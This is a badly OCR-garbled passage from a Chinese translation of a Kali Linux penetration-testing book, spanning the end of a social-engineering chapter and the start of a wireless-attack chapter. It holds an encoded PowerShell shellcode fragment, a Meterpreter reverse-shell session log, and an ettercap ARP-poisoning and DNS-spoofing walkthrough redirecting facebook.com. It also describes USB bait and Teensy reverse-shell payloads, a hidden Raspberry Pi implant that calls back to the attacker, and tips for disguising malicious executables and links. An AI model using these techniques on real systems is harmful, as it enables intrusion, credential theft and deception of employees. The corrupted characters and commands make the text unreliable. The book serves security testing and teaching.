dAAgAGYAbABOAHIAbwBOAGUAYWBOACKAOWBDAEQADAB SAEKAbQBWAGSACGOBOACg 
AGWAbAA1ACKAXQBWAHUAYgB SAGKAYWAgAHMAdABhAHQAAaOB j ACAAZQB 4AHQAZQB. 
CgB 1 AGEACAB 1 AFQAaAB yAGUAYQB kKACGASQBUAHQAUABOAH TATAB SAHAAVABOAHT 
AGUACWASACAAdQBpAGAAdAAgAGQAdWBTAHQAYOB ] AGSAUWBDAHOAZQASACAASQB 
COQBOAEEAZABKAHIAZQBZAHMALAAgAEKAbgBOAFAAdAB y ACAAb ABWAFAAYQB y AGE 


图 7.24 PowerShell x 3; RA 


如 图 7.25 所 示 ，Shellcode 的 执行 没有 触发 目标 系统 上 的 反 病 毒 报 警 。 相 反 ， 当 代码 被 执行 时 ， 它 在 攻击 系统 上 打开 了 
Meterpreter 会 话 ， 并 人 允许 攻击 者 攻击 系统 与 远程 系统 交互 shell。 


msf exploit(handler) > 

[*] Started reverse handler on 0.0.0.0:443 

| Starting the payload handler... 

[*] Sending stage (/69536 bytes) to 192.168.0.101 

[*] Meterpreter session 1 opened (192.168.0.102:443 -> 192.168.0.101:515/8) at 2014-03-30 17:30:57 -0400 
sessions -i 1 

[*] Starting interaction with 1... 


meterpreter > Being 
Computer : DIGITALDEFOI 


0S : Windows 7 (Build 7601, Service Pack 1). 
Architecture : x64 (Current Process is WOW64) 

system Language : en CA 

Meterpreter : x85/win32 


meterpreter > fj 


图 7.25 ”Metetptetet 会 话 


7.3 ”隐藏 可 执行 文件 与 伪 涛 攻击 者 的 URL 


正如 前 面 的 例子 所 述 ， 在 友 起 一 个 社会 工程 攻击 ， 有 两 个 成 功 的 天 键 因 素 。 首 先 需要 获得 一 毕 必 要 的 攻击 信息 ， 如 用 户 名 、 
商业 信息 、 网 络 细节 、 系 统 ， 以 及 应 用 等 。 


然而 ， 大 多 数 的 工作 努力 都 集中 在 第 二 方面 ， 各 具 特 色 的 攻击 ， 以 吸引 目标 进入 一 个 位 置 ， 打 开 一 个 可 执行 文件 ， 或 点 击 一 
个 链接 为 目的 。 


想 成 功 攻击 ， 束 要 求 受害 者 执行 一 些 攻击 生成 模块 。 如 今 用 己 对 执行 未 知 的 软件 变 得 越 来 越 谨 慎 小 心 。 然 而 ， 有 一 些 方 法 可 
以 增加 成 功 执行 攻击 模块 的 可 能 性 ， 主 要 包括 以 下 几 点 : 


ee E 或 伪装 了 的 攻击 源 地 址 。 如 果 攻 击 来 自 于 帮助 平台 或 TT 支持 位 置 ， 并 声称 是 一 个 "紧急 软件 更 新 “， 软 件 
可 能 会 被 执行 。 
将 可 执行 程序 重 命名 为 类 似 于 可 信 的 软件 ， 例 如 MJava 更 新 ”。 


将 恶意 的 有 效 载 荷 嵌 入 良性 文件 ， 如 使 用 Metasplo 计 的 adqobe pdf embedded exe nojs 攻 击 ， 租 入 到 一 个 PDF 文 件 中 。 可 执行 文件 也 可 
以 绑 定 到 微软 0ffice 文 件 、MSI 安 装 文件 ， 或 BAT 文件 ， 配 置 在 更 面 上 默默 地 运行 。 


“有 用 户 点 击 下 载 该 恶意 可 执行 文件 的 链接 。 


由 于 SEToolkit 使 用 攻击 者 的 URL 作 为 其 攻击 的 目标 ， 一 个 关键 的 成 功 因 素 是 确保 攻击 者 的 URL 对 受害 者 是 可 信 的 。 有 几 种 


技术 来 完成 这 一 任务 ， 包 括 以 下 内 容 : 
TUR 使 用 如 goo .gl 或 tinyurl .com 的 服务 。 缩 短 的 网 址 常见 于 社会 媒体 ， 如 Twitter， 受 害 者 点 击 这 样 的 链接 时 很 少 使 用 注意 事 
项 。 


在 社交 媒体 网 站 如 Facepook 或 LinkeqIn 进 入 链接 ;网 站 会 创建 自己 的 链接 来 代替 你 的 ， 使 用 目标 页 面 的 映像 。 然 后 ， 删 除 你 输入 的 链接 ， 
8. POSTERI EE ACR A BER -o 


-在 LinkedIn 或 Facebook 上 创建 假 网 页 。 作 为 攻击 者 ， 你 应 控制 内 容 ， 并 能 创造 一 个 令 人 信服 的 故事 ， 驱 动 成 员 操 击 链接 或 下 载 可 执行 文 
件 。 一 个 良好 的 执行 页 面 将 不 仅 针 对 员工 ， 而 且 针 对 供应 商 、 合 作 伙 伴 和 他 们 的 客户 ， 最 大 限度 地 提高 社会 工程 攻击 的 成 功率 。 


HERAA SCTE, UH A PowerPoint. 


2¢f PowerPoint hirA— MEE, Fasc, DE-N, EAT RE A.pps. fStH— T Binge ain, H 
BIE—MEABAAIMH+. ESR, TEAN— P XCANTETHESTIATEL US mIZAIKT ABE SR. Racinsert (插入 ) ， 然 后 选择 动 
作 标 签 。 在 对 话 框 中 ， 单 击 Hyperlink ( 超 链接 ) 按钮 ， 从 下 拉 荣 单 中 选择 URL (网 址 ) 。 输 入 用 来 友 动 攻击 的 URL， 如 图 7.26 
PR. 


SMART, CFRTEA-TERATA. ATR SEU ATH, FBESCERUEDABIAOGCHEHS, ATI. 
a t 


| Action Settings | Y 


» 


192, 168. 43. 130 


图 7.26 PowerPoint P 43£ A 4442 


7.4 ”使 用 DNS 重 定 同 攻击 的 升级 攻击 


如 果 一 个 攻击 者 或 渗透 测试 者 ， 已 经 侵入 内 部 网 络 中 的 一 个 主机 ， 他 们 可 以 使 用 DNS 重 定向 升级 攻击 。 这 通常 被 认为 是 一 
个 横向 攻击 ( 它 侵入 的 人 有 大 致 相同 的 访问 权限 ) ， 但 是 ， 如 果 捕 获 了 特权 人 员 的 凭据 ， 它 也 可 以 垂直 升级 。 


在 这 个 例子 中 ， 我 们 将 用 ettercap 作 为 噢 探 器 ， 拦 截 和 记录 交换 式 局 域 网 。 它 有 利于 中 国人 攻击 ， 但 是 我 们 将 用 它 来 局 动 一 
个 DNS 重 定向 攻击 ,转移 用 户 到 我 们 的 社会 工程 攻击 的 网 站 。 


开始 攻击 ， 我 们 必须 首先 修改 ettercap 位 于 /etc/ettercap/etter.dns 的 配置 文件 ， 重 定向 查询 我 们 的 恶意 网 站 。 使 用 微软 网 
站 的 样本 ， 在 配置 文件 中 发 现 ， 并 复制 同样 的 细节 ， 直 接 到 目标 网 站 请 求 的 恶意 地 址 ， 如 图 7.27 所 示 。 


通过 键入 ettercap-G， 在 命令 提示 符 下 启动 图 形 模式 。 从 Sniff 表 选项 的 下 拉 菜 单 中 选择 Unified (统一 ) 嗅 闻 ， 如 图 7.28 所 
Ze 


当 提 示 选 择 网 络 接口 时 ， 选 择 内 部 网 络 eth0 (你 可 以 看 到 ， 当 你 选择 一 个 不 同 的 接口 时 ，ettercap 还 将 文 持 无 线 攻 击 ) 。 


你 应 该 看 到 ， 标 签 菜单 已 经 改变 ， 给 你 更 多 选择 内 容 。 


RETRACTED TRE HEE TE AEE ERE E EE TEE EHE UE 


# microsoft sucks ;) 
gá redirect it to www.linux.org 


# 
.] facebook.com A 192.168 
|. * facebook.com A 197.168. 
13 waw., facebook.com PTR 192.168. 
15 microsoft.com A 198.182 
IG *. microsoft.com 只 198.182. 
www.microsoft.com PIR 198.182. 


MER 


.43.130 


43.130 
43.136) 


.195.56 


196.56 
196.36 


i Wildcards in PIR are not allowed 


H7.27 重 定向 配置 文件 


File Options Help 
Unified sniffing... Shift--U 
Bridged sniffing... Shift--B 
Set pcap filter... P 


: . —— 
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ettercap 19 sniff it 3j 


在 Hosts (主机 ) 选项 卡 中 ， 从 下 拉 菜 单 中 选择 Scan for hosts (主机 扫描 ) 。 它 将 进行 快速 扫描 ， 然 后 报告 说 “x 主机 添 
加 到 主机 列表 ”。 从 Hosts 选 项 卡 中 ， 选 择 Hosts list (主机 列表 ) ， 以 查看 到 可 能 的 目标 系统 的 列表 ， 如 图 7.29 所 示 。 


ettercap 0.3.0 


Hosts. View Mitm Filters Logging Plugins ? 


Host List M | Hosts list H | 
IP Address scan for hosts Ctrl S jon 
192.168.43.1 | Loadfromfile.. — Ctrl*O | 
amasi Save to file... Ctrl+5 | 


192.168.43.128 00:0C:29:38:7B:0E 
192.168.43.254 00:50:56:EB:82:93 


mac vendor fingerprin aine A 
1766 tcp OS fingerprint | 
2182 known services 


Add to Target 1 Add to Target 2 


Randomizing 255 hosts for scanning... 
Scanning the whole netmask for 255 hosts... 
4 hosts added to the hosts List... 


图 7.29  ettercap f? Hosts list t jq 


突出 显示 的 系统 是 你 的 希望 目标 (例如 ， 所 有 位 于 同一 个 交换 局 域 网 的 主机 ) ， 选 择 Add to Target 1 (添加 到 目标 1) 选 


项 卡 。 


当 这 样 做 时 ， 选 择 Plugins (插件 ) 标签 ， 这 将 为 你 提供 一 个 可 供 使 用 的 ettercap 插 件 清单 。 选 择 ec_dns_spoof.so 揪 件 ， 如 
图 7.30 所 示 。 


Select a plugin... (as nobody) 


fusr/lib/ettercap | ~ 


ec_arp_cop.so 
ec_autoadd.so 

i ec_chk_poison.so 

B ec dns. spoof so 
ec. dos. attack. so 


ec. dummy.so 


Selection: /usr/lib/ettercap 


ec dns. spoof.so 


图 7.30  ettercap $7 Plugins iż) 
发 动 攻击 ， 选 择 Mitm (HEJA) 选项 下 ， 并 选择 下 拉 荣 单 中 的 Arp poisoning (Arp 染 毒 ) ， 如 图 7.31 所 示 。 在 选 定 的 系统 
上 ，Ettercap 将 感染 地 址 解析 协议 表 (Address Resolution Protocol table) 或 缓存 。 
Start Targets Hosts View bius Filters Logging Plugins Help | 


Arp poisoning... 


Host List WN 


Icmp redirect... 
IP Address 


192.168.43.1 
192.168.43.2 00:50:56:F2 
192.168.43.128 00:0 Stop mitm attack(s) 
192.168.43,254 00:50:56:EB:8 2:93 


Port stealing... 


Dhcp spoofing... 


图 7.31 Mitmi 7j 


ARP poisoning 被 选中 ， 你 将 提供 可 选 参数 。 选 择 参 数 来 嗅 探 远程 连接 。 然 后 ， 转 到 Start 选 项 卡 ， 并 选择 unified 


sniffing。 


当 任 何 目标 系统 上 的 一 个 用 户 ， 试 图 去 Facebook 时 ， 他 们 的 缓 仓 表 将 不 提供 他 们 在 互联 网 上 的 位 置 。ettercap 将 转移 他 们 
的 理 询 网 址 ， 也 融 是 你 在 配置 文件 中 提供 的 网 址 ， 用 户 将 逢 定向 到 由 攻击 者 编写 的 亚 意 网 页 ， 并 受到 攻击 ， 如 任 证 收割 。 


在 任何 时 候 ， 袜 攻击 的 人 在 他 们 的 浏览 器 窗口 中 ， 看 到 的 都 是 正确 的 网 址 。 


DNS 重 定向 可 以 用 于 所 有 的 攻击 ,依靠 用 户 点 击 URL 链 接 发 起 攻击 ， 同 时 适用 于 有 线 和 无 线 网 络 。 


7.5 物理 访问 与 政 对 设备 


当 入 侵 者 用 直接 的 物理 设备 访问 系统 和 网 络 时 ，Kali 和 SEToolkit 也 是 有 利于 攻击 的 。 这 可 能 是 一 个 冒险 的 攻击 ， 因 为 入 侵 
者 可 能 被 细心 的 人 或 被 监控 设备 友 现 。 然 而 ，“ 奖 励 ” 可 能 是 丰厚 的 ， 因 为 入 侵 者 可 以 入 侵 的 系统 中 有 重要 价值 的 数据 。 


物理 访问 通常 是 社会 工程 的 直接 结果 ， 尤 其 是 模仿 应 用 。 模 仿 包 括 以 下 内 容 : 


一 个 目 称 是 帮助 平 全 或 IT 文 持 的 人 ， 只 需要 通过 安 冯 系统 升级 ， 残 能 快速 地 打扰 受害 者 。 
-一 个 小 商贩 和 一 个 客户 聊天 ， 然 后 假装 有 茶 人 要 聊天 ， 或 者 去 洗手 间 。 


-一 个 投递 员 丢 大 一 个 包 庄 。 攻 击 者 可 以 选择 在 线 购买 一 套 制 服 ， 然 而 ， 因 为 大 多 数 人 都 认为 ， 一 吴军 着 标 色 衣服 、 推 者 堆 满 箱子 的 手推车 的 
人 束 是 UPFS 的 快递 员 ， 制 服 对 社会 工程 不 是 必要 的 ! 


aaan BA- NSLS”, WAITE OREN, OPES TOPE A Ce IB) PE, aE S ERA E EE EA R 
AY e 


Fae i, KASS PR, EXAM. Wu LAWCWMERGEÉ— TPR. FRET RAEN, RRA AA, Seg 
师 ， 而 我 们 的 检查 很 少 受到 质疑 。 


对 政 对 的 物理 访问 的 目标 是 快速 入 侵 选 定 的 系统 ， 这 通 弟 是 通过 在 目标 上 安 半 一 个 后 门 ， 或 类 似 的 设备 。 


一 个 经 典 的 攻击 是 在 系统 中 放置 一 个 CD-ROM、DVD 或 USB 密 铀 ， 让 系统 自动 播放 选项 安 丢 它 ; 然而， 许多 组 织 禁 用 在 网 
络 上 目 动 播放 。 


攻击 者 还 可 以 创建 市 有 “有毒 诱饵 ” (poisoned bait) 陷阱 的 移动 设备 ， 包 仿 文 件 的 名 称 ， 邀 请 一 个 人 点 击 文件 ， 并 检查 
其 内 容 。 一 些 例子 如 下 : 


和 带 标 签 的 USB 钥 是 ， 如 员工 工资 或 医疗 保险 更 新 。 


Metasploit 多 许 攻击 者 绑 定 一 个 有 效 载 向， 如 反 回 外壳， 可 执行 文件 ， 如 屏幕 保护 程序 。 攻 击 者 可 以 使 用 公开 可 用 的 企业 形象 ， 创 建 一 个 
屏幕 保护 程序 ， 并 邮寄 CD 给 员工 ， 标 有 新 的 endorsed screensavet 字 样 。 当 用 户 安 装 程序 时 ， 也 安装 了 后 门 ， 它 连接 到 攻击 者 。 


-如 末 你 知道 员工 参加 了 最 近 的 一 次 会 议 ， 攻 击 者 可 以 冒充 一 个 供应 商 ， 并 且 肥 送 给 目标 一 封 信件 ， 暗 示 它 是 供应 商 给 定 的 后 续 服 务 。 一 个 典 
型 的 信息 是 ，*“ 如 下 你 错过 了 我 们 的 产品 演示 和 为 期 一 年 的 免费 试用 ， 请 查阅 USB 钥 是 上 的 幻灯 厂 ， 单 击 start .exe 文 件 ”。 


一 个 有 趣 的 变种 是 SanDisk U3 USB 钥 匙 ， 或 Smart Drive (智能 驱动 ) 。U3 钥 匙 被 预 闪 软件 ， 当 插入 协助 局 动 批准 程序 
时 ， 局 动人 允许 钥匙 直接 写 入 文件 或 注册 表 信 息 。u3-pwn 工 具 (KaliLinux|Maintaining Access|OS Backdoors|u3-pwn) 从 
SanDisk U3 删 除 原来 的 ISO 文件 ， 并 且 用 一 个 敌对 的 Metasploit 载 荷 代 替 它 ， 然 后 编码 以 避免 目标 系统 的 检测 。 


不 幸 的 是 ， 这 些 USB 设 备 的 支持 正在 减少 ， 但 是 ， 面 对 相同 程度 的 Metasploit 其 他 工具 载荷 ， 他 们 仍 有 漏洞 。 


一 个 新 出 现 的 选项 是 使 用 Teensy (一 个 小 型 集成 电路 器 件 ) ， 当 插入 一 个 基于 Windows 的 系统 时 ， 注 册 为 一 个 USB 键 盘 。 
这 人 允许 它 绕 过 系统 的 禁用 上 自动 运行 或 客户 六 反 病毒 软件 。Teensy 可 以 从 亚马逊 网 上 购买 ， 价 格 约 为 20 美 元 。 


SEToolkit 产 生 的 代码 ， 需 要 通过 Teensy 变 成 一 个 攻击 向 量 ， 如 图 7.32 所 示 。 


Select a payload to create the pde file to import into Arauino:, 


1) Powershell HITP GEI MSF Payload 
2) WSCRIPT HTTP GET MSF Payload 
3) Powershell based Reverse Shell Payload 

4) Internet Explorer/FireFox Beef Jack Payload | 
2) Go to malicious java site and accept applet Payload 

6) Gnome wget Download Payload 

/) Binary 2 Teensy Attack (Deploy MSF payloads) 
8) SDCard 2 Teensy Attack (Deploy Any EXE) 

9) SDCard 2 leensy Attack (Deploy on OSX) 
16) X180 Arduino Sniffer PDE and Libraries 
11) X10 Arduino Jammer PDE and Libraries 

12) Powershell Direct ShellCode Teensy Attack 

13) Peensy Multi Attack Dip Switch + SDCard Attack 


图 7.32 使 用 Teensy 


一 个 Teensy 配 置 为 一 个 收 对 代理 是 相当 强大 的 ; 在 企业 客户 的 渗透 测试 过 程 中 ， 我 们 的 测试 表明 ， 对 每 个 测试 网 络 ，100% 


不 幸 的 是 ， 这 些 设备 受到 了 一 个 显著 的 限制 ， 它 们 只 能 作 目 身 程 序 的 内 容 ， 攻 击 者 或 渗透 测 者 在 他 们 入 侵 的 目标 上 ， 任 何 友 
现 的 能 力 都 被 限制 。 


为 了 弥补 这 一 不 足 ， 攻 击 者 现在 使 用 微型 计算 机 ， 如 Raspberry Pi， 作 为 攻击 向 量 。 


Raspberry Pi 攻击 向 量 


Raspberry Pi 是 一 个 微型 计算 机 一 它 的 尺寸 约 8.5cmx5.5cm， 但 能 包含 512 MB RAM、 两 个 USB 端 口 和 一 个 以 太 网 端口 ， 
采用 Broadcom 心 上 请， 使 用 ARM 处 理 器 ， 运 行 频率 700 MHz (可 超频 至 1 GHz) 。 它 不 包括 硬盘 ， 但 使 用 SD 卡 进 行 数据 存储 。 
如 图 7.33 所 示 ，Raspberry Pi 约 为 笔 长 度 的 2/73， 很 容易 隐藏 在 网 络 中 ( 藏 在 工作 站 或 服务 器 后 面 、 放 置 在 服务 器 柜 中 ， 或 隐藏 
在 数据 中 心 的 地 板 下 ) 。 


图 7.33 Teensy £474 


要 将 Raspberry Pi 配置 为 攻击 向 量 ， 以 下 项 目 是 必需 的 : 


‘Raspberry Pi 模型 B， 或 较 新 版 本 。 
一 个 HDMI 电 缆 。 

-微型 USB 电 缆 充 电 设 备 。 

一 种 以 太 网 电 绕 或 小 型 无 线 适配器 。 


一 个 SD 卡 ，10 级 ， 至 少 8GB。 
所 有 的 设备 通常 可 以 在 网 上 买 和 天 ， 费 用 总 计 少 于 100 美 元 。 


为 了 配置 Raspberry， 下 载 Kali Linux ARM 的 最 新 版 本 ， 并 取出 源 档 案 。 如 果 你 的 计算 机 基于 Windows 的 梨 面 配置 ， 然 后 
下 载 并 提取 Win32Disklmager (http://sourceforge.net/projects/win32diskimager/) 。 


使 用 一 个 读 卡 器 ， 连 接 SD 卡 到 基于 Windows 的 计算 机 ， 并 且 打 开 Win32Disklmager。 选 择 ARM 版 本 的 Kali， 提 前 下 载 和 


提取 kali-custom-rpi.img， 并 将 其 写 入 SD 卡 。 这 需要 一 些 时 间 。 
从 MAC 或 Linux 系 统 的 独立 出 来 的 闪烁 的 SD 卡 的 指令 ， 在 Kali 网 站 上 是 可 用 的 。 


fEASTIAMKSD-R2URaspberry Pi， 连 接 以 太 网 电缆 ， 或 无 线 适 配器 到 Windows 工 作 站 ， 通 过 HDMI 电 缆 连 接 到 显示 器 ， 以 
及 使 用 微型 USB 电 源 线 供电 。 一 旦 通电 ， 它 将 直接 引导 到 Kali Linux。Raspberry 依 靠 外 部 电源 ， 没 有 单独 的 开关 ; 然而 ， 仍 然 


可 以 从 命令 行 接受 命令 关闭 Kali。 
一 旦 Kali 安 六 成 功 ， 确 保 运 今 为 止 它 使 用 的 是 apt-get 命 令 。 
确保 SSH 主 机 键 在 不 停 改变 ， 因 为 所 有 的 Raspberry Pi 的 映像 具有 相同 的 密 钥 。 使 用 下 面 的 命令 : 
rootGkali:-rm /etc/ssh/ssh host * 
rootekali:-dpkg-reconfigure openssh-server 


root@kali:~ service ssh restart 


同时 ， 确 保 更 改 默认 的 用 户 名 和 密码 。 


下 一 步 是 配置 Raspberry 连 接 ， 回 到 一 个 攻击 者 的 计算 机 〈 使 用 静态 IP 地 址 ， 或 动态 DNS9 寻 址 服务 ) ， 固 定 间隔 时 间 使 用 


cron, 


攻击 者 必须 在 物理 上 访问 目标 的 处 所 ， 并 连接 Raspberry 到 网 络 。 大 多 数 网 络 目 动 分 配 设备 的 DHCP 地 址 ， 并 且 有 限 地 控制 
对 这 种 类 型 的 攻击 。 


一 旦 Raspberry 连 接 到 攻击 者 的 IP 地 址 ， 攻 击 者 可 以 执行 侦察 ， 利 用 从 远程 位 置 使 用 的 SSH 命 令 ， 对 受害 者 的 内 部 网 络 进行 
攻击 、 渗 透 、 利 用 。 


如 果 连 接 了 无 线 适 配器 ， 如 EW-7811Un，150 Mbps 无 线 802.11b/g/nNano USB 适 配器 ， 攻 击 者 可 以 进行 无 线 连 接 ， 或 者 
使 用 Pi 友 起 无 线 攻击 (参见 第 8 章 ) 。 


76 小 结 


社会 工程 学 是 一 种 黑客 社会 学 (hacking the human) 一 一 利用 人 们 与 生 俱 来 的 信任 和 乐于 助人 的 品质 来 攻击 网 络 及 其 设 
备 。 


在 本 章 中 ， 我 们 研究 了 社会 工程 如 何 用 来 促进 攻击 、 收 获 网 络 凭据 、 激 活 有 恶意 软件 ， 或 协助 友 起 进一步 的 攻击 。 大 部 分 的 攻 
击 依赖 于 社会 工程 工具 SEToolkit;， 然而 ，Kali 有 几 个 其 他 的 应 用 程序 ， 可 以 改进 使 用 社会 工程 学 的 方法 。 我 们 还 研究 了 如 何 进 
行 物理 访问 ,通常 需要 与 社会 工程 相 结 合 ， 可 以 用 来 在 目标 网 络 上 放置 敌对 设备 。 


在 下 一 草 中 ， 我 们 将 研究 如 何 对 无 线 网 络 进行 侦察 ， 攻 击 开放 的 网 络 ， 以 及 使 用 基于 WEP、WPA 和 WPA2 加 密 保护 的 网 
络 。 我 们 还 将 研究 一 般 无 线 协 议 的 弱点 ， 对 它们 进行 拒绝 服务 攻击 和 假冒 攻击 。 


第 8 草 ”利用 无 线 通 信 


鉴于 移动 设备 的 主导 地 位 和 提供 即时 网 络 连 接 的 需要 ， 无 线 网 络 已 成 为 互联 网 上 无 处 不 在 的 接 入 后。 不 玉 的 是 ， 无 线 接 入 在 
提供 便利 性 的 同时 ， 也 市 来 了 盗 穷 访问 、 盗 穷 数 据 ， 以 及 网 络 资 源 拒绝 服务 等 有 效 攻 击 。Kali 提 供 了 多 种 用 于 配置 工具 和 友 启 无 
线 攻 击 的 工具 ， 使 组 织 机 构 能 够 提高 其 安全 性 。 


在 本 章 中 ， 我 们 将 审查 研究 几 个 日 党 任务 和 无 线 攻 击 ， 其 中 包括 : 


配置 Kali 实 现 无 线 攻 击 。 

:无线 侦 察 。 

- 绕 过 MAC 地 址 认证 。 

-破解 WEP 加 密 。 

攻击 WAP 和 WPA2。 

:无 线 攻 击 和 社会 工程 一 克隆 一 个 接 入 点 。 

-截获 通信 信息 一 无 线 中 间 人 攻击 。 

针对 无 线 通 信 的 拒绝 服务 (Denial-of-service，DoS) 攻击 。 


8.1 ”配置 Kali 实 现 无 线 攻击 曝光 
Kali Linux 几 个 工具 的 友 布 使 无 线 网 络 的 测试 变 得 很 容易 ;， 然 而， 这 些 攻 击 需 要 大 量 的 配置 ， 以 达到 充分 有 效 。 除 此 之 外 ,， 
测试 人 员 在 实施 攻击 或 审计 无 线 网 络 之 前 ， 应 该 拥有 丰富 的 无 线 网 络 背 景 。 


在 无 线 安全 测试 中 ， 最 重要 的 工具 是 无 线 适 配器 ， 它 连接 到 无 线 接 入 点 。 它 必须 支持 所 使 用 的 工具 ， 九 其 是 aircrack-ng 工 
具 的 组 件 ; 特别 是 ， 该 卡 的 心 片 和 驱动 器 必须 具备 向 通信 流 注入 无 线 数 据 包 的 能 力 。 这 是 侦察 、 攻 击 的 要 求 ， 必 须 在 目标 和 受害 
者 之 间 注 入 特定 类 型 的 数据 包 。 所 注入 的 数据 包 可 能 会 引起 拒绝 服务 攻击 ， 人 允许 攻击 者 获取 破解 加 密 密 钥 或 支持 其 他 无 线 攻 击 所 
需要 的 信号 交换 数据 。 


aircrack-ng 网 站 (www.aircrack-ng.org) 包含 一 个 已 知 的 兼容 的 无 线 适 配器 列表 。 


在 Kali 中 使 用 的 最 可 靠 适配器 是 ALFA NETWORK cards， 尤 其 是 AWUS036NH 适 配器 ， 它 支持 无 线 802.11b、802.11g 和 
802.11n 协 议 。Alfa cards 已 在 现 有 了 网络 中 使 用 ， 并 支持 Kali 的 所 有 测试 和 攻击 。 


8.2 无 线 侦察 


实施 无 线 攻击 的 第 一 步 是 进行 侦察 一 一 它 可 以 识别 准确 的 目标 接 入 后 ， 并 高 亮度 显示 可 能 影响 测试 的 其 他 无 线 网 络 。 


如 果 你 使 用 连接 USB 的 无 线 网 卡 连接 到 Kali 虚 拟 机 ， 确 保 USB 连 接 已 经 断 开 主 机 操作 系统 ， 并 通过 单 击 USB 连 接 图 标 连 接 到 
VM 虚拟 机 ， 如 图 8.1 所 示 ， 箭 头 所 措 即 USB 连 接 图 标 。 
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图 8.1 USB 连 接 图 标 


接 下 来 ， 通 过 运行 命令 行 中 的 jiwconfig 命 令 ， 确 定 哪些 无 线 接口 是 可 用 的 ， 如 图 8.2 所 示 。 


root@kali:~# iwconfig 


lieth no wireless extensions. 
lo no wireless extensions. 
wlang IEEE 802.1llbgn ESSID:off/any 


Mode:Managed Access Point: Not-Associated Ix-Power-20 dBm 
Retry Long Limit:/ RIS thr:off Fragment thr:off 
Encryption Kkey:off 

Power Management :on 


图 8.2 ”确定 可 用 无 线 接 口 


对 于 肝 毕 特定 攻击 ， 你 可 能 希望 增加 适配器 的 输出 能 力 。 如 果 你 是 一 个 合法 的 同位 无 绪 接 入 点 ， 这 是 特别 有 用 的 ， 和 你 想 要 
的 目标 连接 在 你 的 控制 之 下 的 虚假 的 接 入 后 ， 而 不 是 合法 的 接 入 点 。 这 些 虚 假 或 者 流 呢 (rogue) AR, ITB ERS 
据 ， 并 根据 攻击 的 需要 查看 或 更 改 数据 。 攻 击 者 频繁 复制 或 克隆 合法 的 无 线 网 站 ， 然 后 增加 其 相对 合法 网 站 更 强 的 传输 能 力 ， 来 
作为 吸引 受害 者 的 诱饵 。 使 用 如 下 命令 增加 传输 能 


kali@linux:~# iwconfig wlan0 txpower 30 


使 用 aircrack-ng 及 其 相关 工具 可 以 执行 许多 攻击 。 首 先 ， 我 们 需要 拦截 或 监控 无 线 传 输 ; 因此 ， 我 们 需要 使 用 airmon-ng 
命令 ， 为 监控 模式 (monitor mode) 设置 拥有 无 线 功能 Kali 通 信 接 口 : 


kali@linux:~# airmon-ng start wland 
前 面 命令 的 执行 结果 如 图 8.3 所 示 。 


root(ükali:-£ airmon-ng start wlan8 


Found 3 processes that could cause trouble. 

If eirodump-ng, alreplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) then! 
-Ẹ 

PID Name 

2292 NetworkManager 

2496 wpa supplicant 

30/4 dhclient 


Interface Chipset Driver 


wlan Ralink RI28/0/3070 rt2800usb - [phyl] 
(monitor mode enabled on mong} 


图 8.3 ”使 用 aitmon-ng 命 令 
注意 ， 返 回 的 描述 表明 有 些 进 程 可 能 会 造成 且 烦 。 处 理 这 些 进 程 最 有 效 的 方法 是 使 用 绪 合 性 的 kill 命 令 ， 如 下 所 示 : 
root@kali:~# airmon-ng check kill 


使 用 以 下 命令 查看 本 地 无 线 环境 : 
root@kali:-# airodump-ng monO 
BürByapee, Wn SRE A RAE S BOsSB EIE 3S RURS PITE COTRS UNIS. ote GEEH M ACTEDHIETRTRIU BI] ZG 28 3 


FAHYBSSIDZEAERS Seti, POAT AAI]. SORAS, GAAB Tb PRU. SRA 
息 ， 以 及 提供 无 线 网 名 称 的 ESSID。 相 关 信 息 如 图 8.4 所 示 ， 非 必需 的 ESSID 标 识 符 已 经 被 模糊 。 


CH 12 JL Elapsed: 2 mins ][ 2013-12-14 1/iż2 

BSSID PWR Beacons Data, £/s CH MB ENC CIPHER AUTH ESSID 
02-:2E:FE:3F:483:3B -1 69 © 0 16 11 OPN 
00:05:25:9A:A8:C6 -30 1398 19 [3 6 11 WEP WEP dd wep 
00:1A:30:64:76:80 -50 B5 5 E 3 54e. OPN 
00:1A:30:64:/6:81 -51 96 ( ( 3 54e. WA TKIP PSK 
1C:3bE:84:26:4B:El1  -58 109 ( E 1 54e. OPN 

S4:CDOTBE: 78:16:05 -60 B9 E a l 54e WPA2 CCMP PSK 
BO:11:F5:80:05:A0 -6/ /6 G Bg Ill 54 WEP WEP 
OG:19:A9:56:G8:81 -68 110 E E 4 54e. WA TKIP PSK 
B4:C9:87:50:A5:05 -6/ 69 G E 5 54e. WeA? CCMP PSK 
00:19:A498:56:0B:80 -70 55 9 E 4 54e. OPN 
CB;:D7:189:587:55:8C -72 B2 2 ( ] Ao WBA? CCMP PSK 
1@:FE:ED:6A:65:C4 -73 56 a a o o4a. WAZ CCMP PSK 
FB:/B:BC:10:8E:1F -72 Zi Fi @ 10 54e WeA? CCMP PSK 
00:17:C5:90:B7:ED -73 i © © 1 54e WPA CCMP PSK 
OG:17:C5:90:B/7/:EC -/3 5 E E 1 bde WPA CCMP PSK 
58:b5D:8F:02:6B:5B -73 ld G GO 11 54e Wea? CCMP PSK 
00:17:C5:90:B7:E9 -74 B ( © 1 54e OPN 

BSSID STATION PWR Rate Lost Frames Probe 
Bz:2E:FE:3bP:43:3B 20: /B:51:0E -62 © - Fi 7] 

(not associated) a: 59:7D:/8 ( Q - © 22 

(not associated) ag: 5B:58:85 -/4 Gl - a Z 
00:05:25:9A:A8:C6 48: B3:93:6E -16 0 -1 © 20 
OO:1A:30:604:/6:80 L8: AC :14:07 -1 oge- i l 


图 8.4 ”显示 ESSID 标 识 符 


airodump 命 令 通过 可 用 的 无 线 信 道 循环 执行 ， 并 确定 了 以 下 几 氮 : 


它 是 唯一 的 可 以 标识 无 线 接 入 扣 或 路 由 帮 的 MAC 地 址 。 
每 个 网 络 的 PWR 或 电源 。 尺 管 airodump-ng 错 误 地 显示 功率 为 阴性 ， 但 这 是 一 个 假象 的 报告 。 为 了 获取 正确 的 正 值 ， 接 入 终 靖 并 运行 


airdriver-ng unload36， 然 后 运行 airdriver-ng load35. 
CH 显示 了 用 于 广播 的 频道 。 


-ENC 显示 使 用 的 加 密 技 术 一 它 是 OPN， 或 开放 的 、 没 有 加 密 ， 
提供 额外 的 加 密 信息 。 


.扩展 服务 集 标识 符 (Extended Service Set Identifier, ESSID) 是 由 拥有 相同 SSID 或 名 称 的 接 入 点 组 成 的 无 线 网 络 的 名 称 。 


:基本 服务 集 标识 符 (Basic Service Set Identifier, BSSID) ， 


